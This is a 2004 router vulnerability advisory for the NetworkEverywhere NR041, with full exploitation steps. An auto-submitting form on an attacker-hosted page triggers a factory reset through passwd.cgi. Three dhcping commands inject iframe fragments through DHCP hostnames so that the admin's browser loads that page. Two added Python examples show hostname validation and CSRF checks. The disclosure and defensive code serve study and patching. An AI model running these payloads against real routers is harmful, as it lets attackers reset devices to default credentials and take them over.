
networkEverywhere.txt

Posted Aug 26, 2004
Authored by Mathieu Lacroix

NetworkEverywhere router Model NR041 suffers a script injection over DHCP vulnerability. Full exploitation provided.

tags | exploit
SHA-256 | 903895276da12171f8f6bee9fb35c1e69c16fb6918d5717dc4151e19c8021390



NetworkEverywhere router Model NR041 (latest firmware rev 1.2 Release 03)
suffers a "script injection over dhcp" vulnerability.


The NR041 does not filter the DHCP HOSTNAME option sent by its clients.
Because of that, a web script can be injected into the web-based
administrative interface, where it waits until the administrator consults the
DHCP page; at that point the injected script executes within the open session
and therefore with full access to the router. This exploit allows a
malicious user to reset the box to its factory settings, restoring the default
login, in this case:
Administrator: none
Password: admin.

The NR041's DHCP daemon is reachable from the inside, and the box offers no
wireless access, so this flaw is not easy to exploit; still, a successful
exploitation has a critical impact.
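The root cause above is a DHCP server that copies the Host Name option straight into its admin page. The following is an added example, not code from the advisory or from the NR041 firmware, showing what a router should do instead: parse option 12 out of a DHCP option area without trusting the length byte, validate the value against the RFC 952/1123 host-name grammar, and HTML-escape whatever is displayed. The option-area helper, the sample names and the output markup are assumptions made for the example.

```python
"""Defensive handling of the DHCP Host Name option (option 12) before a
router renders it in its web UI.  Added example; not the NR041 firmware and
not part of the advisory.  The option-area layout and sample names are
constructed for illustration."""
import html
import re

DHCP_MAGIC = b"\x63\x82\x53\x63"   # cookie that starts the DHCP option area
OPT_PAD, OPT_HOSTNAME, OPT_END = 0, 12, 255

# One RFC 952/1123 label: letters, digits and hyphens, no leading/trailing hyphen
_LABEL = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def parse_dhcp_options(area: bytes) -> dict:
    """Parse the TLV option area of a DHCP message into {code: value}.
    A length byte that runs past the buffer is an error, not a silent
    short read, so a crafted packet cannot make us misparse later options."""
    if not area.startswith(DHCP_MAGIC):
        raise ValueError("missing DHCP magic cookie")
    i, opts = len(DHCP_MAGIC), {}
    while i < len(area):
        code = area[i]
        if code == OPT_PAD:
            i += 1
            continue
        if code == OPT_END:
            break
        if i + 1 >= len(area):
            raise ValueError("truncated option header")
        length = area[i + 1]
        value = area[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("option %d length exceeds buffer" % code)
        opts[code] = value
        i += 2 + length
    return opts


def is_valid_hostname(name: str) -> bool:
    """Accept only RFC 952/1123 host names.  Quotes, '<', '>', '/', spaces
    and the other characters the advisory's fragments rely on all fail here."""
    if not 0 < len(name) <= 253:
        return False
    return all(_LABEL.match(label) for label in name.split("."))


def render_client_row(raw_hostname: bytes) -> str:
    """Markup the admin page emits for one lease.  Invalid names are
    replaced by a fixed marker, and valid ones are still HTML-escaped so
    display safety never rests on the validator alone."""
    try:
        name = raw_hostname.decode("ascii")
    except UnicodeDecodeError:
        name = ""
    if not is_valid_hostname(name):
        return "<td>(invalid hostname)</td>"
    return "<td>%s</td>" % html.escape(name, quote=True)


def build_option_area(hostname: bytes) -> bytes:
    """Constructed helper: a minimal option area carrying only option 12."""
    return DHCP_MAGIC + bytes([OPT_HOSTNAME, len(hostname)]) + hostname + bytes([OPT_END])


if __name__ == "__main__":
    # Constructed samples: a normal host and one of the advisory's fragments.
    for sample in (b"laptop-01", b"<iframe id=' "):
        opts = parse_dhcp_options(build_option_area(sample))
        print(render_client_row(opts[OPT_HOSTNAME]))
```

Validation and escaping are deliberately separate layers: the validator rejects anything that is not a host name, and the escape step guarantees that even a name which slips through a future relaxation of the grammar cannot break out of the table cell.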

EXPLOITATION (using DHCPing, available at
http://c3rb3r.openwall.net/dhcping/):



The NR041 is configured via a web-based administrative interface made of
several CGIs invoked with the HTTP POST method.
It is not easy to write a useful script in 15 characters when you cannot break
the string wherever you wish, so the same 'id="' trick used for the
exploitation of the DLINK 614+ is valuable here.


STEP1:

Because we do not have enough room to exploit the router in one shot, we
inject an iframe into the router's page that forces the administrator's browser
to fetch "a.htm" from the malicious web site.
"a.htm" contains a form that submits itself when loaded.
First of all, place the following code on the web server and give it a
one-character name to save space. This code lives on the remote
malicious site and contains the actual attack (a call to passwd.cgi with
FactoryDefaults enabled).
Note that the router IP (192.168.1.1) is hard-coded in this script (it could
be obtained dynamically from the HTTP Referer header), so change it
according to your configuration.

<html><head>
<script language="JavaScript">
<!--
function SymError()
{
return true;
}
window.onerror = SymError;
//-->
</script>
<script language="javascript">
function autopost(){
}
</script>
</head><body onload="javascript:document.xx.submit();">
<form name=xx method=post action="http://192.168.1.1/passwd.cgi">
<input type=hidden name=FactoryDefaults value="Enable">
</form>
</body></html>
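The a.htm form above works only because passwd.cgi accepts any POST that arrives with the administrator's open session, no matter which page produced it. As an added example, not the NR041's passwd.cgi (whose real handler and session mechanism are unknown), the check below shows what the router side needs in order to refuse such a request: the browser-set Origin or Referer header must name the router itself, and the form must carry a per-session token that a page on another site cannot read. The request text, the csrf_token field name and the router origin are constructed for the example; the Origin header postdates the advisory, which is why Referer is accepted as a fallback.

```python
"""Server-side guard for a state-changing CGI such as the advisory's
passwd.cgi.  Added example; the NR041's real handler and session mechanism
are unknown, and the request text, token field name and router origin below
are constructed for the example."""
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

ROUTER_ORIGIN = "http://192.168.1.1"   # LAN address the advisory uses; assumed


def parse_http_request(raw: str):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ")
    headers = {}
    for line in header_lines:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, path, headers, body


def issue_csrf_token() -> str:
    """Per-session secret the admin UI embeds in its own forms."""
    return secrets.token_hex(16)


def is_authorized_change(raw_request: str, session_token: str):
    """Return (allowed, reason) for a request to a state-changing CGI.
    A page on another site can make the admin's browser submit a form, but
    it cannot read the admin page to learn the token, and it cannot set the
    browser-controlled Origin/Referer headers to point at the router."""
    method, _path, headers, body = parse_http_request(raw_request)
    if method != "POST":
        return False, "state change requires POST"
    source = headers.get("origin") or headers.get("referer")
    if not source:
        return False, "no Origin or Referer header"
    parts = urlsplit(source)
    if "%s://%s" % (parts.scheme, parts.netloc) != ROUTER_ORIGIN:
        return False, "request originates from %s, not the router" % parts.netloc
    supplied = parse_qs(body).get("csrf_token", [""])[0]
    if not hmac.compare_digest(supplied.encode(), session_token.encode()):
        return False, "missing or wrong csrf token"
    return True, "ok"


# Constructed request shaped like the one the advisory's auto-submitting
# a.htm form causes the administrator's browser to send.
FORGED_REQUEST = (
    "POST /passwd.cgi HTTP/1.1\r\n"
    "Host: 192.168.1.1\r\n"
    "Referer: http://url.ca/a.htm\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "FactoryDefaults=Enable"
)


def legitimate_request(token: str) -> str:
    """Constructed request as the router's own admin page would submit it."""
    return (
        "POST /passwd.cgi HTTP/1.1\r\n"
        "Host: 192.168.1.1\r\n"
        "Origin: http://192.168.1.1\r\n"
        "Referer: http://192.168.1.1/\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "\r\n"
        "FactoryDefaults=Enable&csrf_token=" + token
    )


if __name__ == "__main__":
    token = issue_csrf_token()
    print(is_authorized_change(FORGED_REQUEST, token))
    print(is_authorized_change(legitimate_request(token), token))
```

The two checks cover each other: a stripped Referer alone (some browsers and proxies drop it) fails the source check, and a request that somehow passes the origin test still needs the token, which the injected iframe's page has no way of obtaining.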



STEP2:

Inject our script into the router using DHCPing:

dhcping -optleasetime 3600 -opttype discover -optreqip 192.168.1.121 -opthostname "/../a.htm' > " -m af:af:af:af:af:af

dhcping -optleasetime 3600 -opttype discover -optreqip 192.168.1.122 -opthostname "'src='//url.ca/" -m af:af:af:af:af:ae

dhcping -optleasetime 3600 -opttype discover -optreqip 192.168.1.123 -opthostname "<iframe id=' " -m af:af:af:af:af:ad

(Tested with a Mozilla browser)


PROBLEM: Unfortunately, we are limited in space for the malicious URL, which
makes all of this a bit tricky, but other means of exploitation may be possible.

Have a nice test ;-)


VENDOR:

NetworkEverywhere support staff were contacted on August 13th but did not
reply to my email.

VULNERABLE:

Product Release Date : September 6, 2002
Current Firmware : Version 1.2 Release 03 (latest)
Firmware Date : May 5, 2003


AUTHOR:

Mathieu Lacroix (Daemonz at videotron.ca)
Thanks to Gregory Duchemin and DHCPing (available at
http://c3rb3r.openwall.net/dhcping/)




